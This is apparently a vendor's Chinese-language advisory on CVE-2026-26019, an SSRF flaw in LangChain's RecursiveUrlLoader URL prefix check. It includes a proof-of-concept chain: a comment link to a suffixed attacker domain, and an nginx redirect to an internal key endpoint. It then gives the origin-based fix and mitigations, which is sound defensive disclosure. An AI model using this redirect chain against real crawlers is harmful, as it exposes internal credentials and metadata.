我们的 AI 引擎 Neutron 在加州大学伯克利分校的 CyberGym 基准测试中取得了 96.75% 的成绩。 了解更多

安全

安全

CVE-2026-26019:LangChain RecursiveUrlLoader 服务器端请求伪造漏洞

对 CVE-2026-26019 的技术剖析。这是 LangChain Community JavaScript 包(< 1.1.14)中一个 CVSS 4.1 中危的服务器端请求伪造漏洞。RecursiveUrlLoader 类使用简单的字符串前缀检查来校验爬取到的 URL,攻击者可借助添加后缀的域名绕过默认的 preventOutside 限制,将爬虫重定向到内部网络资产,从而可能暴露敏感凭据和元数据端点。

CVE-2026-26019

LangChain RecursiveUrlLoader 服务器端请求伪造漏洞

2026 年 2 月 11 日 · CVSS 4.1 中危 · Langchain Community < 1.1.14

CVE 编号 CVSS 受影响版本 修复版本
CVE-2026-26019 4.1 中危 < 1.1.14 1.1.14+

CVE-2026-26019 概述:LangChain RecursiveUrlLoader 中的 SSRF

@langchain/community 包提供了一个 RecursiveUrlLoader 类,用于递归爬取网页,并将其内容加载为文档,供 LLM 处理。研究人员发现,当启用 preventOutside 参数(这也是默认设置)时,该加载器在根据基础 URL 校验子 URL 的方式上存在服务器端请求伪造(SSRF)漏洞。

根本原因在于使用 JavaScript 的 String.startsWith() 方法进行 URL 校验。当 preventOutside 设置为 true 时,加载器会检查发现的每个链接是否以 baseUrl 字符串开头。这种简单的前缀检查没有考虑域名边界,这意味着像 http[:]//example[.]com.evil.com 这样的恶意 URL,在以 http[:]//example[.]com 为基础 URL 时也能通过校验,因为从字符串角度看,它确实以相同的前缀开头。

如果攻击者能够在被爬取的页面中注入链接(例如通过评论区、用户生成内容或已被攻陷的页面),就可以将爬虫重定向到攻击者控制的基础设施,而后者又可以再重定向到内部网络资源,从而暴露 API 密钥、元数据服务和内部端点等敏感数据。

URL 校验中的 SSRF:不安全的前缀匹配

问题的核心在于 URL 来源检查不充分。加载器会遍历页面上发现的所有链接,并通过简单的字符串前缀比较来判断每个链接是否位于允许的爬取范围“之内”。以下代码片段展示了存在漏洞的逻辑:

for (const link of allLinks) {
        if (invalidPrefixes.some((prefix) => link.startsWith(prefix)) || invalidSuffixes.some((suffix) => link.endsWith(suffix))) continue;
        let standardizedLink;
        if (link.startsWith("http")) standardizedLink = link;
        else if (link.startsWith("//")) {
            const base = new URL(baseUrl);
            standardizedLink = base.protocol + link;
        } else standardizedLink = new URL(link, baseUrl).href;
        if (this.excludeDirs.some((exDir) => standardizedLink.startsWith(exDir))) continue;
        if (link.startsWith("http")) {
                const isAllowed = !this.preventOutside || link.startsWith(baseUrl);  /* The critical check line */
                if (isAllowed) absolutePaths.push(link);
                } else if (link.startsWith("//")) {
                    const base = new URL(baseUrl);
                    bsolutePaths.push(base.protocol + link);
                } else {
                    const newLink = new URL(link, baseUrl).href;
                    absolutePaths.push(newLink);
                        }
                }

关键在于 link.startsWith(baseUrl) 这一检查。由于 startsWith() 执行的是原始字符串比较,因此可以轻而易举地实现以下绕过:

// baseUrl = "http://docs.securecorp.com" 
// Attacker link that passes the startsWith
check: "http://docs.securecorp.com.attacker-server.local/"
.startsWith("http://docs.securecorp.com") // => true

CVE-2026-26019 概念验证:通过 SSRF 访问内部资产

利用 CVE-2026-26019 需要经过一个精心设计的三阶段过程,借助 URL 校验缺陷实现对内部网络资源的访问。以下步骤概述了攻击者如何从简单的链接注入一步步发展到完整的 SSRF 利用。

第 1 步:注入恶意链接

整个过程始于一个正在被存在漏洞的应用爬取的合法文档站点。攻击者将一个链接注入到目标页面上用户可控的内容中(例如评论区)。注入的 URL 经过精心构造,在攻击者的域名前加上合法的基础 URL 作为前缀,从而通过前缀校验:

<!DOCTYPE html>
<html>
<head><title>SecureCorp Documentation</title></head>
<body>
  <h1>SecureCorp API Documentation</h1>
  <p>Welcome to our documentation portal.</p>

  <h2>REST API Reference</h2>
  <a href="/api/v1.html">API v1</a>
  <a href="/api/v2.html">API v2</a>

  <hr>
  <h2>Community Comments</h2>
  <div class="comment">
    <b>attacker_user</b>: Hey, I found a typo in the API docs! 
    Check out the corrected version here:
    <a href="http://docs.securecorp.com.attacker-server.local/typo-fix">
      Check this out!!
    </a>
  </div>
</body>
</html>

第 2 步:配置攻击者的重定向

攻击者对其服务器进行配置,使其接收爬虫的请求并发出指向某个内部服务的 301 重定向。正是这一关键步骤,将 SSRF 绕过转化为对内部基础设施的访问:

server {
    listen 80;
    server_name docs.securecorp.com.attacker-server.local;

    # Step 1: Crawler lands here from the poisoned link
    location /typo-fix {
        # 301 Redirect to the internal metadata service
        return 301 http://internal-secret/api/keys;
    }

    # Serve any other pages normally (to seem legit)
    location / {
        root /usr/share/nginx/html;
        index index.html;
    }
}

第 3 步:搭建测试环境

为了复现该缺陷,我们使用了一个受控的 Docker 环境,运行存在漏洞的版本(@langchain/community v1.1.13)。该环境由四个服务组成:

  • legitimate-docs —— 被爬取的文档站点,其中包含注入的链接。
  • attacker —— 由攻击者控制、负责发出重定向的 nginx 服务器。
  • internal-secret —— 只能通过存在漏洞的 Web 应用访问的内部服务。在实际场景中,它可能是一台 SQL 注入防护较为宽松的数据库服务器(因为它信任内部网络)、AWS IMDS 之类的云元数据端点,或者对外部访问进行了过滤、但从应用所在网络内部完全可达的内部服务端口。
  • vulnerable —— 使用 RecursiveUrlLoader 的 Node.js Web 应用。
$ tree .
.
├── attacker # attacker controlled server
│   ├── index.html
│   └── nginx.conf
├── docker-compose.yml
├── internal # internal server accessible only through the vulnrable application
│   ├── Dockerfile
│   └── server.py
├── legitimate-docs # the doc site to crawl by the vulnerable web app 
│   ├── api
│   │   └── v1.html
│   └── index.html
└── vulnerable #  the vulnerable web app server
    ├── app.mjs
    ├── Dockerfile
    └── package.json

一个简单的 Express 端点会在 preventOutside 为 true 的情况下触发爬取

app.get("/crawl", async (req, res) => {
  const { url } = req.query;
  if (!url) return res.status(400).json({ error: "url param required" });

  console.log(`\n${"=".repeat(60)}`);
  console.log(`[*] Crawl requested for: ${url}`);
  console.log(`[*] prevent
Outside: true`);
  console.log(`${"=".repeat(60)}`);

  try {
    const { RecursiveUrlLoader } = await import(
      "@langchain/community/document_loaders/web/recursive_url"
    );

    const compiledConvert = compile({ wordwrap: false });

    const loader = new RecursiveUrlLoader(url, {
      maxDepth: 3,
      preventOutside: true,
      extractor: (html) => compiledConvert(html),
    });                                     

第 4 步:漏洞利用与数据窃取

当针对合法文档站点发起爬取请求时,会执行以下攻击链:

  • 链接发现:爬虫解析合法页面并发现所有链接,其中包括攻击者注入的 URL。
  • 校验绕过:注入的链接以基础 URL 字符串开头,因此通过了 startsWith() 检查。
  • 重定向链:爬虫跟随该链接访问攻击者的服务器,后者返回指向内部服务的 301 重定向。
  • 数据暴露:爬虫跟随重定向并获取内部资源,在爬取结果中返回敏感数据(API 密钥、令牌、ARN)。

攻击者成功利用该 SSRF 漏洞访问了内部网络资产并窃取了敏感凭据——而这一切仅通过公开页面上的一个注入链接就实现了。

如何在 LangChain RecursiveUrlLoader 中修复 CVE-2026-26019

保护您的环境最有效的方法是将 @langchain/community 更新到 1.1.14 或更高版本。该修复使用 URL API 进行严格的来源(origin)比较,取代了简单的 startsWith() 前缀检查。

修复后代码分析

修补后的版本引入了基于来源的校验,能够正确界定域名边界,从而阻止任何添加后缀的域名绕过:

// BEFORE (vulnerable): raw string prefix match const isAllowed = !this.preventOutside ||
link.startsWith(baseUrl); 
// AFTER (fixed): strict origin comparison via URL API const
isAllowed = !this.preventOutside || new URL(link).origin === new URL(baseUrl).origin;

以下来自修补版本的测试用例展示了该修复:

    test("blocks cross-origin URLs with preventOutside", async () => {
      // The key test: verify that subdomain-based SSRF bypasses are blocked
      const baseUrl = "https://example.com";
      const maliciousUrl = "https://example.com.attacker.com";

      // The old vulnerable code would have allowed this:
      // "https://example.com.attacker.com".startsWith("https://example.com") === true
      const vulnerableCheck = maliciousUrl.startsWith(baseUrl);
      expect(vulnerableCheck).toBe(true); // vulnerable approach allows this

      // But the fixed code should reject it:
      // new URL(maliciousUrl).origin !== new URL(baseUrl).origin
      const secureCheck =
        new URL(maliciousUrl).origin === new URL(baseUrl).origin;
      expect(secureCheck).toBe(false); // secure approach blocks this
    });

CVE-2026-26019 缓解措施与最佳实践

  • 立即更新:如果您使用 @langchain/community 进行网页爬取,请确保使用 1.1.14 或更高版本。
  • 校验来源,而非前缀:比较域名时,始终使用正确的 URL 解析(例如 new URL(link).origin),而不是字符串前缀匹配。
  • 网络隔离:确保执行网页爬取的服务无法直接访问内部元数据端点或敏感基础设施。
  • 出站流量过滤:在网络层面应用允许列表或阻止列表,将爬取服务的出站请求限制在已知安全的目的地。
  • 输入净化:对可能被爬取的页面上的用户生成内容进行净化,在渲染外部链接之前将其剥离或进行校验。

参考资料

资源 链接
GitHub 安全公告 GHSA-gf3v-fwqg-4vh7 https://github.com/advisories/GHSA-gf3v-fwqg-4vh7
LangChain 修复变更 https://github.com/langchain-ai/langchainjs/commit/d5e3db0d01ab321ec70a875805b2f74aefdadf9d
NVD https://nvd.nist.gov/vuln/detail/CVE-2026-26019
CWE-918 SSRF https://cwe.mitre.org/data/definitions/918.html